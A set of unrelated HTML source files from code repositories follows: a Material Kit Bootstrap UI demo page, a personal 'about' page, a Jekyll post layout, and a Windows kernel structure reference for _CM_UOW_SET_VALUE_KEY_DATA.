class="slider"></div> <div id="sliderDouble" class="slider slider-info"></div> </div> </div> </div> </div> </div> <div class="section section-navbars"> <div class="container" id="menu-dropdown"> <div class="row"> <div class="col-md-6"> <div class="title"> <h3>Menu</h3> </div> <nav class="navbar navbar-default"> <div class="container-fluid"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#example-navbar"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="#">Menu</a> </div> <div class="collapse navbar-collapse" id="example-navbar"> <ul class="nav navbar-nav"> <li class="active"><a href="#">Link</a></li> <li><a href="#">Link</a></li> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown">Dropdown <b class="caret"></b> </a> <ul class="dropdown-menu dropdown-menu-right"> <li class="dropdown-header">Dropdown header</li> <li><a href="#">Action</a></li> <li><a href="#">Another action</a></li> <li><a href="#">Something else here</a></li> <li class="divider"></li> <li><a href="#">Separated link</a></li> <li class="divider"></li> <li><a href="#">One more separated link</a></li> </ul> </li> </ul> </div> </div> </nav> </div> <div class="col-md-6"> <div class="title"> <h3>Menu with Icons</h3> </div> <nav class="navbar navbar-info"> <div class="container-fluid"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#example-navbar-icons"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="#">Icons</a> </div> <div class="collapse navbar-collapse" id="example-navbar-icons"> <ul class="nav navbar-nav navbar-right"> <li> <a href="#pablo"><i class="material-icons">email</i></a> </li> <li> <a href="#pablo"><i class="material-icons">face</i></a> </li> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown"> <i class="material-icons">settings</i> <b class="caret"></b> </a> <ul class="dropdown-menu dropdown-menu-right"> <li class="dropdown-header">Dropdown header</li> <li><a href="#">Action</a></li> <li><a href="#">Another action</a></li> <li><a href="#">Something else here</a></li> <li class="divider"></li> <li><a href="#">Separated link</a></li> <li class="divider"></li> <li><a href="#">One more separated link</a></li> </ul> </li> </ul> </div> </div> </nav> </div> </div> <div class="title"> <h3>Navigation</h3> </div> </div> <div id="navbar"> <div class="navigation-example"> <!-- Navbar Primary --> <nav class="navbar navbar-primary"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#example-navbar-primary"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="#pablo">Primary Color</a> </div> <div class="collapse navbar-collapse" id="example-navbar-primary"> <ul class="nav navbar-nav navbar-right"> <li class="active"> <a href="#pablo"> <i class="material-icons">explore</i> Discover </a> </li> <li> <a href="#pablo"> <i class="material-icons">account_circle</i> Profile </a> </li> <li> <a href="#pablo"> <i class="material-icons">settings</i> Settings </a> </li> </ul> </div> </div> </nav> <!-- End Navbar Primary --> <!-- Navbar Info --> <nav class="navbar navbar-info"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#example-navbar-info"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="#pablo">Info Color</a> </div> <div class="collapse navbar-collapse" id="example-navbar-info"> <ul class="nav navbar-nav navbar-right"> <li class="active"> <a href="#pablo" > Discover </a> </li> <li> <a href="#pablo"> Profile </a> </li> <li> <a href="#pablo"> Settings </a> </li> </ul> </div> </div> </nav> <!-- End Navbar Info --> <!-- Navbar Success --> <nav class="navbar navbar-success"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#example-navbar-success"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="#">Success Color</a> </div> <div class="collapse navbar-collapse" id="example-navbar-success"> <ul class="nav navbar-nav navbar-right"> <li class="active"> <a href="#pablo"> <i class="material-icons">explore</i> </a> </li> <li> <a href="#pablo"> <i class="material-icons">account_circle</i> </a> </li> <li> <a href="#pablo"> <i class="material-icons">settings</i> </a> </li> </ul> </div> </div> </nav> <!-- End Navbar Success --> <!-- Navbar Warning --> <nav class="navbar navbar-warning"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#example-navbar-warning"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="#pablo">Warning Color</a> </div> <div class="collapse navbar-collapse" id="example-navbar-warning"> <ul class="nav navbar-nav navbar-right"> <li> <a href="#pablo"> <i class="fa fa-facebook-square"></i> </a> </li> <li> <a href="#pablo"> <i class="fa fa-twitter"></i> </a> </li> <li> <a href="#pablo"> <i class="fa fa-google-plus"></i> </a> </li> <li> <a href="#pablo"> <i class="fa fa-instagram"></i> </a> </li> </ul> </div> </div> </nav> <!-- End Navbar Warning --> <!-- Navbar Danger --> <nav class="navbar navbar-danger"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#example-navbar-danger"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="#pablo">Danger Color</a> </div> <div class="collapse navbar-collapse" id="example-navbar-danger"> <ul class="nav navbar-nav navbar-right"> <li> <a href="#pablo"> <i class="fa fa-facebook-square"></i> Share </a> </li> <li> <a href="#pablo"> <i class="fa fa-twitter"></i> Tweet </a> </li> <li> <a href="#pablo"> <i class="fa fa-pinterest"></i> Pin </a> </li> </ul> </div> </div> </nav> <!-- End Navbar Danger --> <!-- Navbar Transparent --> <nav class="navbar navbar-transparent"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#example-navbar-transparent"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="#pablo">Transparent</a> </div> <div class="collapse navbar-collapse" id="example-navbar-transparent"> <ul class="nav navbar-nav navbar-right"> <li> <a href="#pablo"> <i class="fa fa-facebook-square"></i> Facebook </a> </li> <li> <a href="#pablo"> <i class="fa fa-twitter"></i> Twitter </a> </li> <li> <a href="#pablo"> <i class="fa fa-instagram"></i> Instagram </a> </li> </ul> </div> </div> </nav> <!-- End Navbar Transparent--> </div> </div> </div> <!-- End .section-navbars --> <div class="section section-tabs"> <div class="container"> <div class="row"> <div class="col-md-6"> <div class="title"> <h3>Tabs with Icons on Card</h3> </div> <!-- Tabs with icons on Card --> <div class="card card-nav-tabs"> <div class="header header-success"> <!-- colors: "header-primary", "header-info", "header-success", "header-warning", "header-danger" --> <div class="nav-tabs-navigation"> <div class="nav-tabs-wrapper"> <ul class="nav nav-tabs" data-tabs="tabs"> <li class="active"> <a href="#profile" data-toggle="tab"> <i class="material-icons">face</i> Profile </a> </li> <li> <a href="#messages" data-toggle="tab"> <i class="material-icons">chat</i> Messages </a> </li> <li> <a href="#settings" data-toggle="tab"> <i class="material-icons">build</i> Settings </a> </li> </ul> </div> </div> </div> <div class="content"> <div class="tab-content text-center"> <div class="tab-pane active" id="profile"> <p> I will be the leader of a company that ends up being worth billions of dollars, because I got the answers. I understand culture. I am the nucleus. I think that’s a responsibility that I have, to push possibilities, to show people, this is the level that things could be at. I think that’s a responsibility that I have, to push possibilities, to show people, this is the level that things could be at. </p> </div> <div class="tab-pane" id="messages"> <p> I think that’s a responsibility that I have, to push possibilities, to show people, this is the level that things could be at. I will be the leader of a company that ends up being worth billions of dollars, because I got the answers. I understand culture. I am the nucleus. I think that’s a responsibility that I have, to push possibilities, to show people, this is the level that things could be at.</p> </div> <div class="tab-pane" id="settings"> <p>I think that’s a responsibility that I have, to push possibilities, to show people, this is the level that things could be at. So when you get something that has the name Kanye West on it, it’s supposed to be pushing the furthest possibilities. I will be the leader of a company that ends up being worth billions of dollars, because I got the answers. I understand culture. I am the nucleus.</p> </div> </div> </div> </div> <!-- End Tabs with icons on Card --> </div> <div class="col-md-6"> <div class="title"> <h3>Tabs on Plain Card</h3> </div> <!-- Tabs on Plain Card --> <div class="card card-nav-tabs card-plain"> <div class="header header-danger"> <!-- colors: "header-primary", "header-info", "header-success", "header-warning", "header-danger" --> <div class="nav-tabs-navigation"> <div class="nav-tabs-wrapper"> <ul class="nav nav-tabs" data-tabs="tabs"> <li class="active"><a href="#home" data-toggle="tab">Home</a></li> <li><a href="#updates" data-toggle="tab">Updates</a></li> <li><a href="#history" data-toggle="tab">History</a></li> </ul> </div> </div> </div> <div class="content"> <div class="tab-content text-center"> <div class="tab-pane active" id="home"> <p>I think that’s a responsibility that I have, to push possibilities, to show people, this is the level that things could be at. So when you get something that has the name Kanye West on it, it’s supposed to be pushing the furthest possibilities. I will be the leader of a company that ends up being worth billions of dollars, because I got the answers. I understand culture. I am the nucleus.</p> </div> <div class="tab-pane" id="updates"> <p> I will be the leader of a company that ends up being worth billions of dollars, because I got the answers. I understand culture. I am the nucleus. I think that’s a responsibility that I have, to push possibilities, to show people, this is the level that things could be at. I think that’s a responsibility that I have, to push possibilities, to show people, this is the level that things could be at. </p> </div> <div class="tab-pane" id="history"> <p> I think that’s a responsibility that I have, to push possibilities, to show people, this is the level that things could be at. I will be the leader of a company that ends up being worth billions of dollars, because I got the answers. I understand culture. I am the nucleus. I think that’s a responsibility that I have, to push possibilities, to show people, this is the level that things could be at.</p> </div> </div> </div> </div> <!-- End Tabs on plain Card --> </div> </div> </div> </div> <!-- End Section Tabs --> <div class="section section-pagination"> <div class="container"> <div class="row"> <div class="col-md-6"> <div class="title"> <h3>Progress Bars</h3> </div> <div class="progress progress-line-primary"> <div class="progress-bar" role="progressbar" aria-valuenow="60" aria-valuemin="0" aria-valuemax="100" style="width: 30%;"> <span class="sr-only">60% Complete</span> </div> </div> <div class="progress progress-line-info"> <div class="progress-bar progress-bar-info" role="progressbar" aria-valuenow="60" aria-valuemin="0" aria-valuemax="100" style="width: 60%;"> <span class="sr-only">60% Complete</span> </div> </div> <div class="progress progress-line-danger"> <div class="progress-bar progress-bar-success" style="width: 35%"> <span class="sr-only">35% Complete (success)</span> </div> <div class="progress-bar progress-bar-warning" style="width: 20%"> <span class="sr-only">20% Complete (warning)</span> </div> <div class="progress-bar progress-bar-danger" style="width: 10%"> <span class="sr-only">10% Complete (danger)</span> </div> </div> <br /> <div class="title"> <h3>Navigation Pills</h3> </div> <ul class="nav nav-pills" role="tablist"> <!-- color-classes: "nav-pills-primary", "nav-pills-info", "nav-pills-success", "nav-pills-warning","nav-pills-danger" --> <li> <a href="#dashboard" role="tab" data-toggle="tab"> <i class="material-icons">dashboard</i> Dashboard </a> </li> <li class="active"> <a href="#schedule" role="tab" data-toggle="tab"> <i class="material-icons">schedule</i> Schedule </a> </li> <li> <a href="#tasks" role="tab" data-toggle="tab"> <i class="material-icons">list</i> Tasks </a> </li> <li> <a href="#payments" role="tab" data-toggle="tab"> <i class="material-icons">attach_money</i> Payments </a> </li> </ul> </div> <div class="col-md-6"> <div class="title"> <h3>Pagination</h3> </div> <ul class="pagination pagination-primary"> <!-- color-classes: "pagination-primary", "pagination-info", "pagination-success", "pagination-warning", "pagination-danger" --> <li><a href="javascript:void(0);">1</a></li> <li><a href="javascript:void(0);">...</a></li> <li><a href="javascript:void(0);">5</a></li> <li><a href="javascript:void(0);">6</a></li> <li class="active"><a href="javascript:void(0);">7</a></li> <li><a href="javascript:void(0);">8</a></li> <li><a href="javascript:void(0);">9</a></li> <li><a href="javascript:void(0);">...</a></li> <li><a href="javascript:void(0);">12</a></li> </ul> <ul class="pagination pagination-info"> <li><a href="javascript:void(0);">< prev</a></li> <li><a href="javascript:void(0);">1</a></li> <li><a href="javascript:void(0);">2</a></li> <li class="active"><a href="javascript:void(0);">3</a></li> <li><a href="javascript:void(0);">4</a></li> <li><a href="javascript:void(0);">5</a></li> <li><a href="javascript:void(0);">next ></a></li> </ul> <div class="title"> <h3>Labels </h3> </div> <span class="label label-default">Default</span> <span class="label label-primary">Primary</span> <span class="label label-info">Info</span> <span class="label label-success">Success</span> <span class="label label-warning">Warning</span> <span class="label label-danger">Danger</span> </div> </div> <div class="space"></div> <div class="title"> <h3>Notifications</h3> </div> </div> </div> <div class="section section-notifications" id="notifications"> <div class="alert alert-info"> <div class="container-fluid"> <div class="alert-icon"> <i class="material-icons">info_outline</i> </div> <button type="button" class="close" data-dismiss="alert" aria-label="Close"> <span aria-hidden="true"><i class="material-icons">clear</i></span> </button> <b>Info alert:</b> You've got some friends nearby, stop looking at your phone and find them... </div> </div> <div class="alert alert-success"> <div class="container-fluid"> <div class="alert-icon"> <i class="material-icons">check</i> </div> <button type="button" class="close" data-dismiss="alert" aria-label="Close"> <span aria-hidden="true"><i class="material-icons">clear</i></span> </button> <b>Success Alert:</b> Yuhuuu! You've got your $11.99 album from The Weeknd </div> </div> <div class="alert alert-warning"> <div class="container-fluid"> <div class="alert-icon"> <i class="material-icons">warning</i> </div> <button type="button" class="close" data-dismiss="alert" aria-label="Close"> <span aria-hidden="true"><i class="material-icons">clear</i></span> </button> <b>Warning Alert:</b> Hey, it looks like you still have the "copyright &copy; 2015" in your footer. Please update it! </div> </div> <div class="alert alert-danger"> <div class="container-fluid"> <div class="alert-icon"> <i class="material-icons">error_outline</i> </div> <button type="button" class="close" data-dismiss="alert" aria-label="Close"> <span aria-hidden="true"><i class="material-icons">clear</i></span> </button> <b>Error Alert:</b> Damn man! You screwed up the server this time. You should find a good excuse for your Boss... </div> </div> <div class="clearfix"></div> </div><!-- end notifications --> <div class="section"> <div class="container tim-container"> <div class="title"> <h2>Typography</h2> </div> <div id="typography"> <div class="row"> <div class="tim-typo"> <h1><span class="tim-note">Header 1</span>The Life of Material Kit </h1> </div> <div class="tim-typo"> <h2><span class="tim-note">Header 2</span>The Life of Material Kit</h2> </div> <div class="tim-typo"> <h3><span class="tim-note">Header 3</span>The Life of Material Kit</h3> </div> <div class="tim-typo"> <h4><span class="tim-note">Header 4</span>The Life of Material Kit</h4> </div> <div class="tim-typo"> <h5><span class="tim-note">Header 5</span>The Life of Material Kit</h5> </div> <div class="tim-typo"> <h6><span class="tim-note">Header 6</span>The Life of Material Kit</h6> </div> <div class="tim-typo"> <p><span class="tim-note">Paragraph</span> I will be the leader of a company that ends up being worth billions of dollars, because I got the answers. I understand culture. I am the nucleus. I think that’s a responsibility that I have, to push possibilities, to show people, this is the level that things could be at.</p> </div> <div class="tim-typo"> <span class="tim-note">Quote</span> <blockquote> <p> I will be the leader of a company that ends up being worth billions of dollars, because I got the answers. I understand culture. I am the nucleus. I think that’s a responsibility that I have, to push possibilities, to show people, this is the level that things could be at. </p> <small> Kanye West, Musician </small> </blockquote> </div> <div class="tim-typo"> <span class="tim-note">Muted Text</span> <p class="text-muted"> I will be the leader of a company that ends up being worth billions of dollars, because I got the answers... </p> </div> <div class="tim-typo"> <span class="tim-note">Primary Text</span> <p class="text-primary"> I will be the leader of a company that ends up being worth billions of dollars, because I got the answers... </p> </div> <div class="tim-typo"> <span class="tim-note">Info Text</span> <p class="text-info"> I will be the leader of a company that ends up being worth billions of dollars, because I got the answers... </p> </div> <div class="tim-typo"> <span class="tim-note">Success Text</span> <p class="text-success"> I will be the leader of a company that ends up being worth billions of dollars, because I got the answers... </p> </div> <div class="tim-typo"> <span class="tim-note">Warning Text</span> <p class="text-warning"> I will be the leader of a company that ends up being worth billions of dollars, because I got the answers... </p> </div> <div class="tim-typo"> <span class="tim-note">Danger Text</span> <p class="text-danger"> I will be the leader of a company that ends up being worth billions of dollars, because I got the answers... </p> </div> <div class="tim-typo"> <h2><span class="tim-note">Small Tag</span> Header with small subtitle <br> <small>Use "small" tag for the headers</small> </h2> </div> </div> </div> <div class="space-50"></div> <div id="images"> <div class="title"> <h2>Images</h2> </div> <br> <div class="row"> <div class="col-sm-2"> <h4>Rounded Image</h4> <img src="assets/img/avatar.jpg" alt="Rounded Image" class="img-rounded img-responsive"> </div> <div class="col-sm-2 col-sm-offset-1"> <h4>Circle Image</h4> <img src="assets/img/avatar.jpg" alt="Circle Image" class="img-circle img-responsive"> </div> <div class="col-sm-2 col-sm-offset-1"> <h4>Rounded Raised</h4> <img src="assets/img/avatar.jpg" alt="Raised Image" class="img-rounded img-responsive img-raised"> </div> <div class="col-sm-2 col-sm-offset-1"> <h4>Circle Raised</h4> <img src="assets/img/avatar.jpg" alt="Thumbnail Image" class="img-circle img-raised img-responsive"> </div> </div> <div class="row"> </div> </div> </div> </div> <div class="section" id="javascriptComponents"> <div class="container"> <div class="title"> <h2>Javascript components</h2> </div> <div class="row" id="modals"> <div class="col-md-6"> <div class="title"> <h3>Modal</h3> </div> <button class="btn btn-primary" data-toggle="modal" data-target="#myModal"> Launch demo modal </button> </div> <div class="col-md-6"> <div class="title"> <h3>Popovers</h3> </div> <button type="button" class="btn btn-default" data-toggle="popover" data-placement="left" title="Popover on left" data-content="Here will be some very useful information about his popover.<br> Here will be some very useful information about his popover." data-container="body">On left</button> <button type="button" class="btn btn-default" data-toggle="popover" data-placement="top" title="Popover on top" data-content="Here will be some very useful information about his popover." data-container="body">On top</button> <button type="button" class="btn btn-default" data-toggle="popover" data-placement="bottom" title="Popover on bottom" data-content="Here will be some very useful information about his popover." data-container="body">On bottom</button> <button type="button" class="btn btn-default" data-toggle="popover" data-placement="right" title="Popover on right" data-content="Here will be some very useful information about his popover." data-container="body">On right</button> </div> <br /><br /> <div class="col-md-6"> <div class="title"> <h3>Datepicker</h3> </div> <div class="row"> <div class="col-md-6"> <div class="form-group label-static"> <label class="control-label">Datepicker</label> <input type="text" class="datepicker form-control" value="03/12/2016" /> </div> </div> </div> </div> <div class="col-md-6"> <div class="title"> <h3>Tooltips</h3> </div> <button type="button" class="btn btn-default btn-tooltip" data-toggle="tooltip" data-placement="left" title="Tooltip on left" data-container="body">On left</button> <button type="button" class="btn btn-default btn-tooltip" data-toggle="tooltip" data-placement="top" title="Tooltip on top" data-container="body">On top</button> <button type="button" class="btn btn-default btn-tooltip" data-toggle="tooltip" data-placement="bottom" title="Tooltip on bottom" data-container="body">On bottom</button> <button type="button" class="btn btn-default btn-tooltip" data-toggle="tooltip" data-placement="right" title="Tooltip on right" data-container="body">On right</button> <div class="clearfix"></div><br><br> </div> <div class="title"> <h3>Carousel</h3> </div> </div> </div> </div> <div class="section" id="carousel"> <div class="container"> <div class="row"> <div class="col-md-8 col-md-offset-2"> <!-- Carousel Card --> <div class="card card-raised card-carousel"> <div id="carousel-example-generic" class="carousel slide" data-ride="carousel"> <div class="carousel slide" data-ride="carousel"> <!-- Indicators --> <ol class="carousel-indicators"> <li data-target="#carousel-example-generic" data-slide-to="0" class="active"></li> <li data-target="#carousel-example-generic" data-slide-to="1"></li> <li data-target="#carousel-example-generic" data-slide-to="2"></li> </ol> <!-- Wrapper for slides --> <div class="carousel-inner"> <div class="item active"> <img src="assets/img/bg2.jpeg" alt="Awesome Image"> <div class="carousel-caption"> <h4><i class="material-icons">location_on</i> Yellowstone National Park, United States</h4> </div> </div> <div class="item"> <img src="assets/img/bg3.jpeg" alt="Awesome Image"> <div class="carousel-caption"> <h4><i class="material-icons">location_on</i> Somewhere Beyond, United States</h4> </div> </div> <div class="item"> <img src="assets/img/bg4.jpeg" alt="Awesome Image"> <div class="carousel-caption"> <h4><i class="material-icons">location_on</i> Yellowstone National Park, United States</h4> </div> </div> </div> <!-- Controls --> <a class="left carousel-control" href="#carousel-example-generic" data-slide="prev"> <i class="material-icons">keyboard_arrow_left</i> </a> <a class="right carousel-control" href="#carousel-example-generic" data-slide="next"> <i class="material-icons">keyboard_arrow_right</i> </a> </div> </div> </div> <!-- End Carousel Card --> </div> </div> </div> </div> <div class="section"> <div class="container text-center"> <div class="row"> <div class="col-md-8 col-md-offset-2 text-center"> <h2>Completed with examples</h2> <h4>The kit comes with three pre-built pages to help you get started faster. You can change the text and images and you're good to go. More importantly, looking at them will give you a picture of what you can built with this powerful kit.</h4> </div> </div> </div> </div> <div class="section section-full-screen section-signup" style="background-image: url('assets/img/city.jpg'); background-size: cover; background-position: top center; min-height: 700px;"> <div class="container"> <div class="row"> <div class="col-md-4 col-md-offset-4"> <div class="card card-signup"> <form class="form" method="" action=""> <div class="header header-primary text-center"> <h4>Sign Up</h4> <div class="social-line"> <a href="#pablo" class="btn btn-simple btn-just-icon"> <i class="fa fa-facebook-square"></i> </a> <a href="#pablo" class="btn btn-simple btn-just-icon"> <i class="fa fa-twitter"></i> </a> <a href="#pablo" class="btn btn-simple btn-just-icon"> <i class="fa fa-google-plus"></i> </a> </div> </div> <p class="text-divider">Or Be Classical</p> <div class="content"> <div class="input-group"> <span class="input-group-addon"> <i class="material-icons">face</i> </span> <input type="text" class="form-control" placeholder="First Name..."> </div> <div class="input-group"> <span class="input-group-addon"> <i class="material-icons">email</i> </span> <input type="text" class="form-control" placeholder="Email..."> </div> <div class="input-group"> <span class="input-group-addon"> <i class="material-icons">lock_outline</i> </span> <input type="password" placeholder="Password..." class="form-control" /> </div> <!-- If you want to add a checkbox to this form, uncomment this code <div class="checkbox"> <label> <input type="checkbox" name="optionsCheckboxes" checked> Subscribe to newsletter </label> </div> --> </div> <div class="footer text-center"> <a href="#pablo" class="btn btn-simple btn-primary btn-lg">Get Started</a> </div> </form> </div> </div> </div> </div> </div> <div class="col-md-12 text-center"> <a href="examples/signup-page.html" class="btn btn-simple btn-primary btn-lg" target="_blank">View Signup Page</a> </div> <div class="space-50"></div> <div class="section section-examples"> <div class="container-fluid text-center"> <div class="row"> <div class="col-md-6"> <a href="examples/landing-page.html" target="_blank"> <img src="assets/img/landing.jpg" alt="Rounded Image" class="img-rounded img-raised img-responsive"> <button class="btn btn-simple btn-primary btn-lg">View Landing Page</button> </a> </div> <div class="col-md-6"> <a href="examples/profile-page.html" target="_blank"> <img src="assets/img/profile.jpg" alt="Rounded Image" class="img-rounded img-raised img-responsive"> <button class="btn btn-simple btn-primary btn-lg">View Profile Page</button> </a> </div> </div> </div> </div> <div class="section section-download"> <div class="container"> <div class="row text-center"> <div class="col-md-8 col-md-offset-2"> <h2>Do you love this UI Kit?</h2> <h4>Cause if you do, it can be yours for FREE. Hit the button below to navigate to Creative Tim where you can find the kit. Start a new project or give an old Bootstrap project a new look!</h4> </div> <div class="col-xs-8 col-xs-offset-2 col-sm-4 col-sm-offset-4"> <a href="http://www.creative-tim.com/product/material-kit" class="btn btn-primary btn-lg"> <i class="material-icons">cloud_download</i> Free Download </a> </div> </div> <br><br> <div class="row text-center"> <div class="col-md-8 col-md-offset-2"> <h2>Want more?</h2> <h4>We've just launched <a href="http://demos.creative-tim.com/material-kit-pro/presentation.html?ref=utp-freebie" target="_blank">Material Kit PRO</a>. It has a huge number of components, sections and example pages. Start Your Development With A Badass Bootstrap UI Kit inspired by Material Design.</h4> </div> <div class="col-xs-8 col-xs-offset-2 col-sm-4 col-sm-offset-4"> <a href="http://demos.creative-tim.com/material-kit-pro/presentation.html?ref=utp-freebie" class="btn btn-upgrade btn-lg" target="_blank"> <i class="material-icons">unarchive</i> Upgrade to PRO </a> </div> </div> <div class="row sharing-area text-center"> <h3>Thank you for supporting us!</h3> <a href="#" class="btn btn-twitter"> <i class="fa fa-twitter"></i> Tweet </a> <a href="#" class="btn btn-facebook"> <i class="fa fa-facebook-square"></i> Share </a> <a href="#" class="btn btn-google-plus"> <i class="fa fa-google-plus"></i> Share </a> <a href="#" class="btn btn-github"> <i class="fa fa-github"></i> Star </a> </div> </div> </div> </div> <footer class="footer"> <div class="container"> <nav class="pull-left"> <ul> <li> <a href="http://www.creative-tim.com"> Creative Tim </a> </li> <li> <a href="http://presentation.creative-tim.com"> About Us </a> </li> <li> <a href="http://blog.creative-tim.com"> Blog </a> </li> <li> <a href="http://www.creative-tim.com/license"> Licenses </a> </li> </ul> </nav> <div class="copyright pull-right"> &copy; 2016, made with <i class="material-icons">favorite</i> by Creative Tim for a better web. </div> </div> </footer> </div> <!-- Sart Modal --> <div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true"> <i class="material-icons">clear</i> </button> <h4 class="modal-title">Modal title</h4> </div> <div class="modal-body"> <p>Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast of the Semantics, a large language ocean. A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar. </p> </div> <div class="modal-footer"> <button type="button" class="btn btn-default btn-simple">Nice Button</button> <button type="button" class="btn btn-danger btn-simple" data-dismiss="modal">Close</button> </div> </div> </div> </div> <!-- End Modal --> </body> <!-- Core JS Files --> <script src="assets/js/jquery.min.js" type="text/javascript"></script> <script src="assets/js/bootstrap.min.js" type="text/javascript"></script> <script src="assets/js/material.min.js"></script> <!-- Plugin for the Sliders, full documentation here: http://refreshless.com/nouislider/ --> <script src="assets/js/nouislider.min.js" type="text/javascript"></script> <!-- Plugin for the Datepicker, full documentation here: http://www.eyecon.ro/bootstrap-datepicker/ --> <script src="assets/js/bootstrap-datepicker.js" type="text/javascript"></script> <!-- Control Center for Material Kit: activating the ripples, parallax effects, scripts from the example pages etc --> <script src="assets/js/material-kit.js" type="text/javascript"></script> <script type="text/javascript"> $().ready(function(){ // the body of this function is in assets/material-kit.js materialKit.initSliders(); window_width = $(window).width(); if (window_width >= 992){ big_image = $('.wrapper > .header'); $(window).on('scroll', materialKitDemo.checkScrollForParallax); } }); </script> </html>
zhouxinyong/code-demo
demoHouse/material_kit/index.html
HTML
mit
58,219
<div id="about"> <header class="twelve columns"> <h1>My background</h1> <p class="opening">I'm a programmer, entrepreneur, speaker, designer, and trail runner among other things. As an engineer I've worked across the stack in backend, web, and mobile. I live and work in Los Angeles and studied at UCLA.</p> </header> <div id="page-content" class="twelve columns"> <section class="twelve columns"> <p>I'm currently an Engineering Manager working on feature development and engineering best practices alongside a great team at <a href="https://www.gotinder.com/" target="_blank">Tinder</a>. I'm also an organizer of monthly meetups at the <a href="http://lactoforum.org/" target="_blank">LA CTO Forum</a>.</p> <p> In 2015 I was featured in Inc.'s <a href="https://enplug.com/blog/enplug-makes-inc-magazines-2015-30-under-30-list">30 under 30</a> for co-founding <a href="https://enplug.com">Enplug</a>, a display software for teams and businesses.</p> <p>You can find my work history on <a href="https://www.linkedin.com/in/alexross8">LinkedIn</a>, or you can download my <a href="/src/pdf/AlexRoss-Resume.pdf">resume</a>. I have a few projects on <a href="https://github.com/aleross">Github</a>.</p> </section> <article id="photos" class="twelve columns"> <img src="/src/img/about/1.jpg"> <img src="/src/img/about/4.jpg"> <img src="/src/img/about/13.jpg"> <img src="/src/img/about/11.jpg"> <img src="/src/img/about/5.jpg"> <img src="/src/img/about/7.jpg"> </article> <article class="twelve columns"> <h2>Programming</h2> <p>I frequently work across the full stack, including mobile. Below are some technologies I've used in production projects:</p> <ul> <li><strong>Front-end:</strong> HTML5, CSS3, SASS, JavaScript</li> <li><strong>Back-end & scripting:</strong> NodeJS, PHP, Ruby, Python</li> <li><strong>Frameworks:</strong> AngularJS, Bootstrap, jQuery, Wordpress, ZendFramework</li> <li><strong>Servers:</strong> Linux, Apache, RabbitMQ, Rackspace, AWS</li> <li><strong>Databases:</strong> MySQL, MongoDB, Redis, DynamoDB, Firebase (DBaaS)</li> <li><strong>Mobile:</strong> Objective-C & Interface Builder, Java (Android), PhoneGap/Cordova</li> <li><strong>Dev tools:</strong> Git, Grunt, Bower, NPM, Composer, Jasmine+Karma</li> <li><strong>The Internet:</strong> DNS, HTTP, sockets, CDNs, load-balancing, etc.</li> <li><strong>Design:</strong> Adobe Photoshop & Illustrator, InvisionApp</li> </ul> <p></p> </article> </div> </div>
aleross/alexross.codes
src/html/pages/about.html
HTML
mit
2,831
--- layout: default --- <h2>{{ page.title }}</h2> <div class="post"> {{ content }} </div>
jiko/stopabadcure
_layouts/post.html
HTML
mit
90
<html><body> <h4>Windows 10 x64 (18362.329)</h4><br> <h2>_CM_UOW_SET_VALUE_KEY_DATA</h2> <font face="arial"> +0x000 PreparedCell : Uint4B<br> +0x004 OldValueCell : Uint4B<br> +0x008 NameLength : Uint2B<br> +0x00c DataSize : Uint4B<br> </font></body></html>
epikcraw/ggool
public/Windows 10 x64 (18362.329)/_CM_UOW_SET_VALUE_KEY_DATA.html
HTML
mit
296
